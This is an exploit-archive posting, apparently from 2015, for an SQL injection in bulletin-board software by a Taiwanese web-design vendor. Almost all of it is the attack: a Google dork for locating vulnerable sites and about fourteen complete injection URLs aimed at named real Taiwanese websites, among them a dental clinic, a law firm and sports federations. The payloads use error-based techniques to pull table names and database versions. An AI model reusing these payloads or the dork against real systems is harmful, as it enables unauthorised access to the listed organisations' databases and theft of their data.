Design By 種籽網頁設計 SQL injection

2015.12.28

Credit: Ashiyane Digital Security Team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: site:.tw inurl:board.php? stx=

######################
# Exploit Title : Design By 種籽網頁設計 SQL injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.e-seed.com.tw/
# Google Dork : site:.tw inurl:board.php? stx=
# Date: 26 Dec 2015
# Tested On : Win 10 / Google Chrome
#
######################
# adminpage= target/adm/
#
# demos :
# http://www.chain-dent.com.tw/bbs/board.php?bo_table=dental&page=1&sfl=1'&sod=desc&sop=and&sst=40(SELECT 1 from(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(table_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+-
# http://sun-wang.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://hsu-design.com/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://pentathlon.org.tw/bbs/board.php?bo_table=links&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.shootingsport.org.tw/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.in-motel.com.tw/bbs/board.php?bo_table=room&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.flower888.com.tw/bbs/board.php?bo_table=special&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.tw-sd.com/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.su-attorneys.com.tw/bbs/board.php?bo_table=legal&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.wtd.com.tw/bbs/board.php?bo_table=building&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://home-light.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.cscsignal.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
######################
# discovered by : modiret
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Design By 種籽網頁設計 SQL injection

Dork: site:.tw inurl:board.php? stx=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.